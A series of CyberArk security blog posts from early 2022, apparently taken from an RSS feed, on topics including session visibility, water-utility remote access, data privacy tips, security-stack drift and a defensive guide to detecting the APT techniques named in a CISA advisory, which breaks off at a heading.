Winston Churchill once said, “Criticism may not be agreeable, but it is necessary. It fulfills the same function as pain in the human body. It calls attention to an unhealthy state of things.” Many cyber attacks begin as a twinge — so minor they often go unnoticed until things become injurious. By exploiting weaknesses in systems and processes, and in human nature itself, Red Teamers push cybersecurity teams to think differently and see things sooner, no matter how uncomfortable the process may be. Empowered, these teams have the prescient ability to anticipate future failures — and work to stop them before they ever happen.

]]>
Why User Session Visibility is Key for Secure Applications https://www.cyberark.com/blog/why-user-session-visibility-is-key-for-secure-applications/ Tue, 08 Feb 2022 14:00:42 +0000 https://www.cyberark.com/?p=127335 Need Secure Applications? Learn What's Happening with Users

“What’s happening?”

In the movie Office Space, it was a question to dread whenever Initech Vice President Bill Lumbergh would lean over long-suffering employee Peter Gibbon’s cubicle wall with an unreasonable request. This, of course, set off a chain of events including job dissatisfaction, hypnotism to mitigate said job dissatisfaction … oh, and an ill-advised embezzlement attempt inspired by the plot of Superman III.

As a security practitioner who needs to secure applications used by your global workforce, you’re no stranger to the question of “What’s happening?

However, in your context, there’s no comedy — only urgency, high stakes and in many cases, a lack of visibility into real-time events that could lead to a devastating breach, attack or even an insider threat. And chances are you’re hearing this question more frequently, partly due to the rapid adoption of cloud-based apps that — while crucial for empowering your workforce — also give everyday users access to sensitive resources.

Perhaps you used to focus your energy on the high-risk privileged users like IT admins. But now, virtually everyone across your workforce has privileged-level access to something.

So it’s becoming clear that, when it comes to Identity and Access Management (IAM), organizations need to look beyond the crucial point of authentication and add layers of visibility and security to the actions people take once they’re inside the applications.

Without that, a security team loses time, loses ground and likely loses sleep.

We know that burnout is a major problem in the cybersecurity industry, exacerbated by an incomplete view into threats, despite a constant barrage of alerts and data. In fact, 83% of cybersecurity professionals said they’re struggling to cope with security alert fatigue as they try to distinguish meaningful insights from false alarms.

If you’re feeling like this and you too are struggling to respond to fire drills regularly without the insight you need into what’s causing incidents, you should know you’re not alone on this one.

CyberArk recently surveyed 900 global security leaders and decision makers to learn how they are monitoring, auditing and securing end users’ activity within high-risk applications. These cloud-based tools, such as Salesforce and workforce collaboration applications, often contain sensitive data such as financial records, customer information and intellectual property. The survey participants shared insights on their limits and pain points, as well as their aspirations for how greater visibility into user sessions could help them.

It turns out there’s a major opportunity for improvement. Here’s a snapshot of what we learned.

Today, 63% of organizations give their typical end user access to between five and 10 (or more) applications that contain or enable access to resources that attackers would deem high value.

End user app access

However, with access comes risk: 80% have experienced end users misusing or abusing access to these applications in the past year. This trend comes at a time when 97% of security leaders say credential theft is on the rise, with end users who have access to sensitive resources making up the biggest increase in targets by attackers.

When potential security issues emerge, security teams typically comb though user logs — sometimes thousands of lines —  in search of clues to discover what happened. But nearly half (48%) of organizations surveyed have limited ability to view these logs and audit user activity. This keeps them in the dark about potentially risky actions taken in web application sessions.

With more insight into users’ actions within sensitive business applications, security decision makers believe they’d gain a wide range of benefits. For example, 41% of those surveyed say they’d be able to identify the source of a security incident more quickly.

User Activity Visibility Benefits

But with their current limitations, organizations may be at risk from insider actions, both from honest mistakes and malicious attacks (per the above mentioned plot of Office Space). And they may be vulnerable to external threats, such as identity compromise via phishing and credential theft.

So what can security decision makers do to improve their approach to web application security for high-risk user sessions?

It starts with asking yourself some important questions about the tools you use and the capabilities they offer. Some examples:

  • Can your team easily produce a record of what goes on during specific end-user activity in a given application?
  • If not, how much time do you lose to data log reviews, and how does that affect your window of opportunity for discovering what’s transpired?
  • As you review user activity or behavior, how confident are you that the person who initiates a web session is actually the person using the application?
  • And do you have the mechanisms in place to continuously verify a user’s identity in the event they were to walk away from their workstation?

Read our eBook The Hidden Gap in Web Application Security: User Sessions for a deep-dive look at our research findings that will help you evaluate how well — and how comprehensively — you are protecting your users’ sessions in applications that contain sensitive resources, in comparison with your peers. The eBook also provides insights to help you assess and improve your security posture.

With greater visibility, you can reframe the dreaded question “What’s happening?” into one of support, as in: “How are you doing?”

In light of the pressures today’s security practitioners are under, we could all use a lot more of that.

]]>
Let the Cybersecurity (Winter) Games Begin https://www.cyberark.com/blog/let-the-cybersecurity-winter-games-begin/ Thu, 03 Feb 2022 14:00:53 +0000 https://www.cyberark.com/?p=126957 Cybersecurity olympics

Nothing draws people together like sporting events — we love the inspiration that comes from witnessing the best of the best — and groan together in the agony of defeat. For the athletes themselves, events like the Winter Games represent the culmination of a lifetime of dedication. And while there’s no gold medal to celebrate their hard work, cybersecurity professionals spend their careers in similar fashion to top athletes — honing their craft as they fight the good fight. That’s why even a humble couch potato can learn a few security lessons from the Games, as the determination and camaraderie of the athletes parallel cybersecurity’s team sport mentality.

As the classic movie Cool Runnings teaches us (time and again), bobsled is a sport that requires agility, control and, most importantly, teamwork. Not only must security teams work together in lockstep, but they must also collaborate closely with other business functions — such as DevOps teams — to quote the movie, “feel the rhythm, feel the rhyme.” And since leaning too far in one direction can spell disaster, security approaches must strike the right balance between protecting the business and moving at the pace of innovation.

One of the most physically demanding sports of the Games, alpine skiing combines speed and skill. Slalom skiers must traverse down a winding mountain path, passing through gates positioned on alternating sides. Missing a gate can lead to disqualification. It’s a concept well understood by cyber attackers: to reach an intended target — the “finish line” — they must use hijacked privileged credentials to get through “gated” areas and unlock higher levels of access. Defenders understand that when an attacker inevitably barrels down the mountain, blocking this privilege progression is the best way to protect valuable assets from harm.

Like the figure skaters who weave together strength and beauty, cybersecurity threat researchers toe the line between science and art. Researchers have their own unique style and approach to problem solving, and sometimes the data they gather requires interpretation to work through various shades of grey. Analytics help them map connections, model threats and paint a comprehensive picture of the landscape.

Sometimes referred to as “chess on ice,” curling requires a great deal of strategy and patience to overcome the opponent. Cybersecurity requires the same mindset, with security teams thinking moves ahead, slowing attackers’ progression down the board and blocking access to valuable corporate assets. A mistimed or ill-aimed stone or an unprotected or misconfigured privileged account could give the opposing team the advantage and, ultimately, place you in checkmate.

Skeleton is one of the fastest-paced sports at the Games, with a single athlete sliding headfirst down an icy track at speeds of 80 miles per hour or higher on a tiny sled. In a DevSecOps-enabled business, DevOps is the “sled” you jump into to develop, test and release new innovations with agility and speed to meet fast-evolving customer needs. But the smallest detail, like the angle of a turn on the track or a mismanaged secret, can slow things down or even result in a multi-sled pileup (or a ripple effect down a supply chain). Shifting left to build security into development workflows can make the run as smooth as possible without sacrificing the speed you need to win.

Nothing depicts a Red Team vs. Blue Team exercise better than hockey. Much like red teams, forwards are laser-focused on scoring goals — often by whatever means possible. Adversarial simulations help these teams think like their opponents to outscore them. And like hockey defensemen stopping opponents from gaining the zone, Blue Team cyber defenders need a high degree of skill paired with hyper vigilance to close gaps and block shots.

Short track speed skating offers an extra layer of excitement with pack starts. Crashes are common as skaters jockey for position, hoping to pace themselves just right to end the race in first place. Security Operations Center (SOC) teams work in “short track” environments, where things can change in fractions of a second as analysts triage threats from all angles. Like a skater determining the best time to push ahead, SOC analysts must stay cool under pressure, quickly prioritizing and responding to the riskiest security events.

Snowboarding combines athleticism with the creativity of skateboard tricks. Sometimes the prevailing conditions on the halfpipe can affect an athlete’s performance — requiring adaptation midair. In the world of cybersecurity, adversaries are constantly adapting their methods, and security teams must be just as agile and creative to stay ahead. One thing is certain on the halfpipe and on security’s front lines: no two flight paths are ever the same.

The world-class athletes we see at the Games have gone through years of intensive training and preparation. Likewise, security defenders must prepare to stay on the edge of threat research trends, continuously advance their skills and race against time to outthink and outsmart attackers to win gold.

 

 

]]>
Secure Third-Party Access to Protect Water Systems and Critical Operational Technology https://www.cyberark.com/blog/secure-third-party-access-to-protect-water-systems-and-critical-operational-technology/ Wed, 02 Feb 2022 20:17:26 +0000 https://www.cyberark.com/?p=126856 Water System Cybersecurity

82 gallons: that’s how much water the average American uses each day. While we should all attempt to minimize our consumption, it’s easy to take the availability of clean, safe water for granted — from brewing that first pot of coffee in the morning to ending the day with a shower. Yet just like the other critical systems that make modern life possible, the IT infrastructure that water treatment plants and related systems rely on is not only aging, but is also under pressure to become more connected, reliant on automation and maintained through remote connections. For these reasons, as the past several years have demonstrated, this infrastructure is also an attractive target in cyber attacks.

Last week, the Biden administration unveiled a 100-day cybersecurity plan for U.S. water utility operators and extended its Industrial Control Systems (ICS) Cybersecurity Initiative to the sector in response to a spate of recent attacks. The plan focuses on establishing a task force of water sector leaders, bolstering security incident monitoring capabilities, improving information sharing and data analysis, and providing technical support for water systems.

Global Water Systems Under Attack

In February 2021, attackers breached a Florida water treatment plant, gained control of its SCADA system and successfully raised the sodium hydroxide in the water by 100-fold to a poisonous level. Later in the year, U.S. federal agencies issued a joint advisory warning of ongoing threats to water and wastewater systems, citing several phishing and ransomware attacks on facilities in California, Maine and Nevada, among others.

Vulnerable water systems are a global issue: in 2020, Israel experienced a major attempted attack on its water infrastructure, and the U.K. has warned of “credible threats” to its critical infrastructure, including the water sector. A 2021 SANS Institute study paints a troubling picture: one in 10 wastewater plants has a critical security vulnerability today.

As operational technology (OT) assets are increasingly connected to IT networks, remote access to these critical systems is now the norm. Since the pandemic began, critical infrastructure operators — from water treatment plants to oil pipelines — must focus on protecting privileged access to the applications and systems that are responsible for keeping this infrastructure up and running.

Operational Technology: Connected, But Not Adequately Protected

Traditionally, industrial control systems and process and production equipment were not connected to a network. Modifications to OT environments could only be performed through in-person physical interaction with system controls (pulling levers, flipping switches and turning dials). So, security risks were limited to the people who had direct access to the facility. But as digitalization and IoT adoption accelerated, many OT environments, full of decades-old technology, were brought online. Today, OT and IT networks are becoming increasingly interconnected. This increases the attack surface for industrial organizations by increasing the number of sensitive systems online. All access to these systems must be treated as privileged access, something attackers consistently seek out to execute their plans.

Meanwhile, business requirements and pandemic-driven safety concerns have forced many organizations to adapt jobs that traditionally required physical presence at the facility to a remote model. As a result, internal and third-party personnel responsible for operating, troubleshooting, upgrading and maintaining OT equipment often do so remotely.

The U.S. Department of Homeland Security (DHS) provides examples of identities that may legitimately require remote access to control systems. These include, but are not limited to, internal employees — such as systems operators, maintenance engineers and field technicians — and external parties — such as vendors, business partners, systems integrators, MSPs and regulatory entities. To help ensure safe, continuous operation of water, wastewater and other OT facilities, all such identities need secure remote access to systems. However, provisioning standing (or ‘always on’) privileged access to critical devices and systems in OT environments can heighten the risk of credential theft.

The SANS 2021 Survey: OT/ICS Cybersecurity identified external remote services as the most frequent attack vector involved in OT/control systems incidents. Similarly, the U.S. Cyber and Infrastructure Security Agency (CISA) cites access as one of the most prevalent IT and OT weaknesses and risks.

Insecure Remote Access Puts OT Systems at Risk

Considering how disruptive a cyber intrusion can be in OT environments like water facilities, the importance of treating all vendors and employees with remote access as privileged identities — and protecting their access accordingly — cannot be overestimated. Unfortunately, risky security practices are far too common, such as:

  • Sharing administrator credentials for SCADA and other critical systems
  • Provisioning third parties with standing access rights in corporate directories
  • Failing to securely store, manage and distribute credentials — including those for air-gapped systems
  • Using the same passwords for multiple accounts
  • Giving operators and maintenance personnel administrator-level access to critical systems they do not regularly access
  • Providing unrestricted, anytime access to sensitive resources
  • Improperly air-gapping systems, exposing systems to the internet unnecessarily or using an unsecured local area network
  • Running outdated, unpatched operating systems and software

The 2021 Florida water plant attack highlighted several of these issues, specifically around weaknesses in remote access. According to reports, all computers used by plant personnel to access the SCADA system for water treatment had remote access and a shared password, despite the sensitivity of the required operations.

Many OT environments and water facilities disconnect — or “air-gap” — systems from the internet for security purposes. Even in air-gapped OT environments, securing remote access remains vital. Plant equipment, HMI, DCS, PLC and other OT systems still require maintenance and upgrades performed by internal staff and, oftentimes, external contractors. In these situations, privileged credentials used to access critical systems must be provisioned securely and carefully monitored. Yet too many organizations share passwords in antiquated systems like Excel files with shared systems.

Protect Privileged Access to Address Most Prevalent OT Weaknesses

Fortunately, Identity Security solutions, centered on privileged access management, can provide offline privileged access, eliminating the issue of credential sprawl, no matter the environment. Internal admins and third-party contractors can retrieve privileged credentials and maintain session audit via mobile apps, helping organizations defend against attacks targeting credential theft while satisfying audit and compliance.

By enabling secure third-party access as part of a Zero Trust approach to security, industrial control organizations can help address the most prevalent identity-related weaknesses and risks identified by CISA:

Identity Related IT and OT Weaknesses

Of course, strengthening controls on remote access is one of many critical steps toward greater cyber resilience. Today’s utility organizations are often under-resourced. OT systems are aging and straining from decades of use. Skilled cybersecurity practitioners are increasingly hard to find. And industry regulations remain inconsistent (at best). It’s encouraging to see our water systems and other critical infrastructure getting the increased cybersecurity attention they so desperately need — but we still have a long way to go.

Learn more about secure remote access and Privileged Access Management for OT and IT environments in the CyberArk resources library, and take the first step to secure remote vendor access in an interactive tour of CyberArk Vendor Privileged Access Manager.

]]>
Protect Your Personal Information this Data Privacy Day https://www.cyberark.com/blog/protect-your-personal-information-this-data-privacy-day/ Thu, 27 Jan 2022 14:00:07 +0000 https://www.cyberark.com/?p=126564 Protect Your Personal Information this Data Privacy Day

Every day, millions of people are duped into sharing personal information online that they shouldn’t. Maybe they’re unclear about how data is collected and used in our digital society, maybe they’re distracted or maybe they’re so used to getting emails from their bank that they fill out one of those we-need-to-update-your-information requests without a second thought.

Even the most discerning online users get caught off guard by social engineering schemes that seem totally legitimate. Just a few weeks ago, that banking spoof happened to one of my own security-conscious family members.

Raising awareness about these common attack tricks, educating citizens on ways to protect their personal information and encouraging more transparency from businesses that collect customer data are the goals of Data Privacy Day 2022. This international initiative is observed on January 28 in the United States, Canada, Israel and 47 European countries (where it’s known as Data Protection Day).

How You Can Protect Your Most Valuable Data

Every time you, as a consumer, set up a new online account or application, you’re asked for personal details that are often beyond what the service provider needs, such as such as geographic location, and access to contacts list, photo albums and more. Each bit of information provides valuable insights about you — for both the service provider and would-be attackers — and should be shared with discretion and care. The National Cybersecurity Alliance has a great list of tips for managing your privacy settings on popular online accounts and personal devices.

Of course, there are plenty of instances when consumers do not have a say in the matter: online fraud is rampant, and just last year there were over 450,000 reported instances of credit card fraud. The good news is it’s become easier to cancel a credit card or alert your bank that your account may have been compromised.

What’s more difficult to get past is an attack on your personal identity — on the things that make you you: your name, the day you were born, your address, your social security number. An attack on your identity could mean someone taking out a credit card or a loan in your name and running up debt, for example. This could negatively impact your credit score, then down the road, your ability to buy a car, activate a cell phone, take out a mortgage and more.

One of the reasons attackers have become so successful at tricking individuals into disclosing personal information is the specificity of their attempts. They work hard to get to know you and your everyday habits before making their move, like where you bank and which cable company or energy supplier you use.

My family member’s bank email spoof was a textbook example of this. Another happened to a friend who received a “number spoof” call from someone pretending to be from his child’s gymnastics school – quite a personal and specific context. The attacker used the gym’s legitimate number on caller ID to attempt to gain familiarity and trust to attempt to obtain banking information unethically.

Unfortunately, the pandemic only exacerbated the problem. With so many people working remotely, spending more time online and in many cases, switching between devices and personal and public WiFi services, bad actors found fertile ground for social engineering attacks.

Even though they’ve evolved their tactics in the face of opportunity, they’re still using con artist tricks that have worked for ages. They’re just trying to make us do what we wouldn’t normally do by using details or bits of information to lull us into panicking or letting our guard down. The old techniques haven’t gone away — they’ve just had a boost from technology.

Identity is the New Currency and Should be Treated as Such

Some things just go better together, like peanut butter and jelly, or data privacy and data security. There are some simple — yet highly effective — ways to secure your personal data in daily life. And in a lot of ways, they mirror basic practices embodied in the Zero Trust security model many enterprises follow today. In honor of Data Privacy Day, consider taking these proactive steps on January 28:

  • Change all your passwords, make sure they are strong (25+ characters) and use a unique password for everything. Repeating the same password for multiple devices or services just gives attacks more room to move.
  • Activate multi-factor authentication (MFA) whenever you can — especially on accounts containing sensitive information about your personal identity.
  • If you’ve got an iPhone, you can use the password wallet. Also consider using a password manager to help secure your personal passwords for various accounts. That way, you never have to save credentials in your browser, since attackers have many clever ways to capture them there.

Even if someone is trying to use your personally identifiable information (PII), setting up these password roadblocks will help mitigate some of the damage that can be done.

Of course, individuals aren’t the only ones who need to change their attitudes and behaviors around data privacy. Organizations also need to be more diligent about protecting customer data — especially PII — by regularly assessing data practices, adhering to industry and government regulations and enhancing transparency around what type of data is collected and for what purpose.

Protecting what makes you you requires vigilance and a collective effort to emphasize and protect the true value and privacy of personal data. Only then can we mitigate attackers’ power and defang their tricks — whether old or new.

 

]]>
CyberArk CHRO on Bridging the Cybersecurity Skills Gap https://www.cyberark.com/blog/cyberark-chro-on-bridging-the-cybersecurity-skills-gap/ Tue, 25 Jan 2022 14:00:41 +0000 https://www.cyberark.com/?p=126544 CyberArk CHRO on Bridging the Cybersecurity Skills Gap

As cyber attacks continue to grow in frequency and scale, demand for qualified professionals far outweighs supply, fueling a fiercely competitive talent war. Amplified by the pandemic, this worldwide cybersecurity talent shortage has far-reaching implications for organizations’ ability to protect against evolving threats. We asked CyberArk Chief Human Resources Officer Ruth Shaked to share her perspectives on ways to address this growing challenge.

Prioritize Your People’s Priorities

“Where, when, how and even why people work has changed. To protect and grow your organization’s greatest asset — your team — and remain competitive, your cultural practices must change too,” Shaked says. In a word, they’ve got to get flexible. This is true for cybersecurity professionals and knowledge workers across industries and functions.

A 2021 Microsoft survey of more than 30,000 workers in 31 countries found 70% of people want flexible remote work options to continue, while over 65% are craving more in-person time with their teams. Bottom line: people want options, and hybrid work is here to stay.

The same study found 39% of employees feel exhausted. And in the fast-paced world of cybersecurity, these burnout rates are even higher: according to a 2020/2021 Chartered Institute of Information Security (CIIS) State of the Profession report, 54% of cybersecurity professionals admitted they had either left a job due to overwork or burnout or have worked with someone who has. To reverse this trend, flexible work models must not only take employees’ physical wellbeing into account but also their mental health and social and intellectual well-being.

The way employees “climb the corporate ladder” is also shifting away from a linear approach that can limit the development of new skills, exposure to diverse ideas and meaningful contribution opportunities. Corporate structures are moving toward more flexible “lattice” models that support mobility in multiple directions and across various functional areas within the organization, better reflect workers’ priorities and values, and bolster employee satisfaction and retention.

Focusing on your people’s priorities is not only the right thing to do; it’s also good for business. “Happy, healthy employees provide best-in-class service, deliver greater innovation and ultimately drive success,” Shaked says.

“Where, when, how and even why people work has changed. To protect and grow your organization’s greatest asset — your team — and remain competitive, your cultural practices must change too.”

– Ruth Shaked, CyberArk Chief Human Resources Officer

Give Teams the Training and Tools Needed to Succeed

While attackers continue to innovate, technology is changing at a rapid pace.  “It’s no surprise that cloud security tops the list of professional development priorities for the next two years,” Shaked says, referencing a 2021 (ISC)2 Cybersecurity Workforce Study. “Closing the gap requires greater investment in training and development, while giving over-worked and over-stressed security professionals the time they need to actually take advantage of these programs,” she continues. “Intensive boot camp-style training courses are great options for people with the right aptitude, right attitude, curiosity and willingness to learn.”

One potentially overlooked way to address these gaps is by conducting cybersecurity training for non-security teams. Shaked points to CyberArk’s own internal program as an example. “One of the goals of the program is to train our developers in secure coding practices, teaching everything from threat modeling and cryptography to penetration testing. This helps to promote our security-first culture, while creating a new growth path for developers,” she says.

Technology can also play a supporting role in addressing shortages and freeing up time for workers to learn new cybersecurity skills, reskill or upskill. The same (ISC)2 workforce study found that in the next year, organizations plan to increase their use of cloud service providers (38%) and intelligence and automation for manual cybersecurity tasks (37%).

Create a Diverse and Inclusive Culture  

A diverse, inclusive work environment is proven to foster innovation, inspire people, deepen engagement and ultimately, improve retention. “As competition escalates for skilled cybersecurity workers, employees both expect and seek out evidence of their employer’s commitment to workplace diversity, equity and inclusion (DE&I),” Shaked says.

Building a culture of representation and belonging is a top priority for Shaked and the entire leadership team at CyberArk, and she notes that ongoing employee communication and feedback has helped deepen their focus and drive continuous improvement. “DE&I is fundamental to our core CyberArk values — one of which is ‘We,’ which means always engaging respectfully with others and always acting as a team player.”

She continues, “We’ve rolled out a global employee diversity training program built on three core pillars: authenticity, which means doing what we say we will do; accountability for enabling an inclusive culture; and awareness of inclusive behaviors, practices and processes.” As part of this, all employees participate in training courses that explore topics such as supporting allyship, overcoming unconscious bias and embracing inclusive behaviors. Other aspects of the program include formal inclusive recruiting certification for talent acquisition personnel, diversity coaching workshops for leadership teams and special initiatives tied to local and global days of diversity, such as PRIDE Month and Chinese New Year.

CyberArk’s ongoing participation in, and sponsorship of, organizations such as Partnership Inc. and TRIBE Academy reinforce the company’s commitment to hiring and celebrating employees across unique cultures, experiences, backgrounds and identities. As Shaked puts it, “Inviting people to the dance is not good enough. We need to invite everyone to dance.

Elevate Women in Cybersecurity

One clear way to foster workplace diversity is attracting more women to cybersecurity — a field in which women have long been underrepresented. This is a topic particularly near and dear to Ruth. “We need to bring more women’s voices and perspectives to the table — especially in cybersecurity leadership positions,” she says.

Providing professional development, coaching, mentorship and network building opportunities is key to elevating women within their organizations. At CyberArk, Shaked is particularly proud of CYBRWomen, a recently launched employee resource group designed by women, for women. She explains, “CYBRWomen’s mission is to recognize and empower our incredible women here at CyberArk. This global community is a safe space to come together, support one another, promote female-driven ideas and innovation and help women achieve their professional goals.”

“Inviting people to the dance is not good enough. We need to invite everyone to dance.”

– Ruth Shaked, CyberArk Chief Human Resources Officer

Encouraging women to explore cybersecurity career paths during college is also an important step in addressing the talent shortage, Shaked notes. CyberArk’s partnership with Wentworth University to offer scholarships to women enrolled in cyber studies and other STEM careers is one initiative supporting that goal. And to attract women entering the profession or exploring new opportunities, organizations must prioritize inclusive hiring practices that consider women, along with flexible work options that promote work-life balance.

Inspire the Next Generation of Cybersecurity Leaders

Raising awareness about cybersecurity careers requires collaboration across enterprises and educational institutions, out-of-the-box thinking and an early start. For instance, researchers are teaching virtual reality-based cybersecurity lessons to K-12 students using a familiar method: video games. And speaking of familiar, TikTok — one of the world’s most popular social platforms — is working to promote content aimed at getting kids interested in cybersecurity and privacy careers. Meanwhile, cybersecurity apprenticeship and internship programs (such as those offered by CyberArk) are helping college students develop skills on the job, while supporting more diverse candidates.

“If this world fascinates you, learn as much as you can,” encourages Shaked. “When it comes to cybersecurity, the sky’s the limit. Maybe coding isn’t your thing, but there’s also a need for creative individuals looking to tackle new challenges, for those with strong communication and management skills — there are so many different paths under the cyber umbrella to choose from.” She suggests taking a spin through this National Initiative for Cybersecurity Careers and Studies (NICCS) list of cybersecurity career profiles, as well as CyberArk’s own career page, to help students and individuals considering a career change get a better understanding of their options.

As with the field of cybersecurity itself, there’s no silver bullet — no single solution — that will fix this worldwide skills shortage. But by focusing on employee empowerment and growth, DE&I-centric people practices and awareness building at critical steps along students’ educational journey, organizations can serve as powerful engines for change.

]]>
7 Steps to Keep Cybersecurity Systems from Drifting https://www.cyberark.com/blog/keep-cybersecurity-systems-from-drifting-in-7-steps/ Fri, 21 Jan 2022 14:00:36 +0000 https://www.cyberark.com/?p=126534

Years ago, American writer and futurist Alvin Toffler described technology as “the great growling engine of change.” This is as true today as it ever was: enterprise IT infrastructures are growing and interconnecting rapidly, spanning on-premises data centers, disparate workforces and, in many cases, multiple clouds.

Technology Change Brings Inevitable Drift

The application and infrastructure components within these enterprise technology environments need to be adjusted regularly to better support internal users and enable product improvements. As ad-hoc updates are made, technology systems can slowly start to move apart — especially when changes aren’t documented consistently — sometimes leading to system failures and costly outages. Similar issues arise frequently in cloud and DevOps environments, in which change is constant. Piecemeal configurations and updates can create problems and over time, drive up technical debt — the implied cost of future re-work to fix issues that weren’t addressed at the start.

This phenomenon — known as “drift” in tech circles — is common and can happen to even the most well-meaning practitioners. To help keep systems aligned, configuration management tools are often used to automate change management tasks.

Is Your Security Stack Drifting Apart?

Cybersecurity is one functional area that isn’t often associated with drift. Yet the systems built to protect digital enterprise networks can also slip off kilter. Left unchecked, this can negatively impact system performance and expose organizations to risk.

A typical enterprise deploys about 45 different tools as part of its “cybersecurity stack,” with each solution playing a role in defending the organization’s IT environment. Of course, this “stack” isn’t a physical stack at all. Instead, it’s a complex web of layered security controls that, increasingly, are delivered as a service and extend beyond the network perimeter to encircle individual users and their devices.

As these security stacks evolve to keep pace with internal change, hybrid workforce requirements and emerging cyber threats, system changes — albeit necessary — can drive inconsistencies, dissonance and drift.

While they all should look familiar, it’s important to revisit security fundamentals periodically, making sure protections you’ve put into place cover everything — including your security deployments themselves.

7 Best Practices for Minimizing Drift and Protecting Your Cybersecurity Solutions

1. Whenever possible, reduce the number of privileged accounts and/or the extent of their privileges to reduce the attack surface. Clearly define how sysadmins and other highly privileged users, as well as applications, should access security systems via privileged accounts — and under what conditions. Following this foundational practice of least privilege security applies to everything in your IT environment, including your cybersecurity solutions. If your team relies on configuration management tools to help keep drift at bay, remember that privileged access to them should be managed, monitored and controlled following the principle of least privilege.

2. Enforce multi-factor authentication (MFA) for accessing your security deployments for all users, including product administrators, to help mitigate common credential theft techniques such as keystroke logging and plaintext password harvesting.

3. Many cybersecurity infrastructure components are highly sensitive and should be treated as Tier 0 assets. As part of this, tightly restrict access to component servers. Start by following Microsoft’s best-practices for mitigating pass-the-hash attacks and other credential theft.

4. Establish a “normal” baseline for system activity. Take advantage of analytics to model baseline behaviors and benchmark risk levels. This will help speed the detection of anomalies and indicators of compromise (IOCs), such as a privileged user who suddenly accesses credentials at an unusual time of day or from an unusual location, demonstrates excessive usage or follows other abnormal trends.

5. To detect problems early, it is also essential to monitor and review the logs generated by both the security solutions and the infrastructure on which they run. The most effective approaches will apply analytics to enable automatic response to high-severity incidents — blocking in-progress attacks on critical systems and reducing the impact of any issue, whether security or operational.

6. The use of insecure protocols can easily render other security controls invalid. To reduce the risk of eavesdropping and other network-based attacks, use encrypted and authenticated protocols for all communications such as LDAPS and TLS.

7. Even with extensive controls and best practices in place, security system outages may occur. Having a documented disaster recovery plan is a must. The plan should specifically take your security deployments into account and be tested yearly (at minimum) to see how quickly your organization can recover data and restore operations. Remember that practice makes perfect.

While not a comprehensive list, these recommendations reflect our CyberArk team’s experience in helping customers implement industry best practices, drawing on deep experience as a Trusted Advisor to organizations around the world.

Looking for a place to start? Consider conducting a Red Team adversary simulation to identify places where drift could be putting you at risk.

As long as the great growling engine that is technology keeps changing, so must security. As your organization matures its cybersecurity strategy this year, start out strong by making sure the tools within your security stack are protected. This will help validate that the controls you’ve already implemented have not drifted and are working as expected to thwart threat actors and protect what matters most.

 

]]>
CISA on Ukraine Cyber Attacks: Are You at Risk? https://www.cyberark.com/blog/cisa-on-ukraine-cyber-attacks-are-you-at-risk/ Wed, 19 Jan 2022 14:00:35 +0000 https://www.cyberark.com/?p=126476 Ukraine Attacks CISA Advisory

Reports of a large-scale cyber attack targeting Ukrainian organizations and several government department websites have emerged in recent days. In response, the Cybersecurity & Infrastructure Security Agency (CISA), National Security Agency (NSA) and Federal Bureau of Investigation (FBI) issued a joint advisory to help organizations better understand the threats posed by nation state attackers and mitigation steps to build cyber resilience.

The authors urge defenders — particularly those in critical infrastructure sectors — to be prepared and stay vigilant. This is especially true as evidence of a new wiper malware emerged over the weekend, targeting Ukrainian organizations. While this guidance comes from U.S. government agencies, it is applicable to organizations around the world.

CyberArk Labs and Red Team conducted a technical review of the advisory to recommend event detection and risk mitigation best practices.

Is My Organization at Risk? How to Investigate a Potential Incident

Based on reports of the Ukraine attacks, the intruders were able to execute a start-to-finish compromise by stealing credentials, using the command interpreter and leveraging password stores, to name just a few of their methods. Fortunately for defenders, the attackers triggered numerous red flags — also known as indicators of compromise (IOCs) — along the way.

The CISA advisory outlines tactics, techniques and procedures (TTPs) used by nation state-sponsored advanced persistent threat (APT) actors, based on the MITRE ATT&CK framework. We will focus on three key categories: Execution, Persistence and Credential Access. If you believe your organization has been targeted in an APT-style attack, CyberArk recommends following these investigative steps to spot IOCs throughout the attack chain, gauge risk severity and respond quickly.

Execution

In this stage, the attackers used CMD.exe and PowerShell to execute commands and tasks on remote machines.

IOCs
  • Often when cmd.exe is used to execute remote commands, we see it proceeded by the “/c” directive. These executions are often uncommon enough that we can successfully sift through them.
  • The user creating the cmd.exe is relevant as well. Often, we won’t see the SYSTEM user creating cmd.exe shells.
  • The parent process tree here can be incredibly useful. You will usually see cmd.exe ran as a child of certain processes, such as explorer.exe when a user double clicks it. If a strange parent is spotted, this can be a great IOC for monitoring.
Detection Steps
  • Windows Event Logs event ID 4688 can provide new process creations as well as their command line arguments. We can monitor all cmd.exe /c executions with this event ID, as well as the additional arguments to identify potential malicious activity.
  • The same event ID provides the user creating the process. Use this to monitor for suspicious users accessing cmd.exe.
  • It also provides the parent process that created the new process. Use this to find strange parent procs creating cmd.exe, such as outlook.exe.

Persistence

As they worked to establish persistence, the attackers were observed obtaining credentials through several different mechanisms.

Brute force password attacks. Attackers conducted brute-force password guessing and password spraying campaigns to see which credentials would obtain valid access.

IOC
  • A large number of logon failures from a single user, or many logon failures across the organization in quick succession.
Detection Steps
  • Alerts can be generated for this by observing for many failed logon events using Windows Event ID 4625.

 

Kerberoasting. Kerberoasting is when a single user tries to request tickets from service accounts within the domain for purposes of brute forcing the service account’s passwords to plaintext, then uses the account and its permissions directly within the network.

IOCs
  • During a kerberoast, attackers will often attempt to do a downgrade from AES to RC4 to get a value that will be easier to brute force.
  • Attackers will often target all service accounts within a domain, which will generate large numbers of requests for a single user.
Detection Steps
  • Windows Event ID 4769 provides details on new Kerberos service tickets being granted. Observing the “Ticket Encryption Type” parameter, detections can be generated on DES (0x1 and 0x3) and RC4 (0x17 and 0x18) encryption types for further review.
  • Observing many service ticket requests for a single user via Windows Event ID 4769 and across multiple services within a short time frame, as users generally aren’t attempting to authenticate to 10+ services at once.

 

OS Credential Dumping. The APT actors were observed exfiltrating credentials and exporting copies of the Active Directory database ntds.dit.

IOCs
  • Access to the ntds.dit file. Depending on your environment and how backups are enabled, you may have false positives here. The goal is to monitor access to the ntds.dit for any attempt at abnormal access, outside of normal hours or from an abnormal user or machine, for example.
Detection Steps
  • Windows Event ID 4663 can be used to observe access to the ntds.dit file. To filter down the information, accesses can be observed as Read or something similar is all that’s required to copy the file.
  • VSSAdmin.exe executions for shadow copies can also be observed using using this event ID to observe abnormal backup runs.

Credential Access

From there, the attackers looked for vulnerabilities to exploit, along with private key certificate files on compromised systems for insecurely stored credentials.

Obtain Private Keys. The attackers also obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates and perform a Golden SAML attack, which gave them access to anything that trusts SAML tokens within the environment.

IOCs
